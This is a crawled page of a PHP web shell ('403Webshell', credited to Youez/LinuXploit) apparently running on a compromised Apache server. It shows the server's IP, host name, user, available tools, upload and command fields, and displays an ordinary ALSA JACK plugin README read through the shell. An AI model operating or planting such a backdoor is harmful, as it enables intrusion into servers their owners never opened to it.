403Webshell
Server IP : 93.86.61.54  /  Your IP : 216.73.216.60
Web Server : Apache/2.4.62 (Ubuntu)
System : Linux rasin.ddns.net 6.8.0-124-generic #124~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue May 26 21:05:19 UTC x86_64
User : www-data ( 33)
PHP Version : 8.4.22
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/doc/libasound2-plugins/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/doc/libasound2-plugins/README-jack
JACK <--> ALSA PCM plugin
=========================

This plugin converts the ALSA API over JACK (Jack Audio Connection
Kit, http://jackit.sf.net) API.  ALSA native applications can work
transparently together with jackd for both playback and capture.

	ALSA apps (playback) -> ALSA-lib -> JACK plugin -> JACK deamon
	ALSA apps (capture) <- ALSA-lib <- JACK plugin <- JACK daemon

This plugin provides the PCM type "jack".  The typical configuration
looks like below:

	pcm.jack {
		type jack
		playback_ports {
			0 alsa_pcm:playback_1
			1 alsa_pcm:playback_2
		}
		capture_ports {
			0 alsa_pcm:capture_1
			1 alsa_pcm:pcapture_2
		}
	}

Put the above to ~/.asoundrc (or /etc/asound.conf), and use "jack" PCM
with your ALSA apps.  For example,

	% aplay -Djack foo.wav

The jack plugin can have two config options: playback_ports and
capture_ports.  Both are compound type config, including the following
format:
	{
		channel	port-name
		channel port-name
		...
	}
The first argument is the channel number (zero-based) and the second
is the corresponding JACK port name.

The plugin is installed in /usr/lib/alsa-lib directory as default,
which is the default search path of additional plugins for alsa-lib.
On a 64bit system like x86-64, the proper prefix option (typically,
--prefix=/usr/lib64) must be given to configure script.


Youez - 2016 - github.com/yon3zu
LinuXploit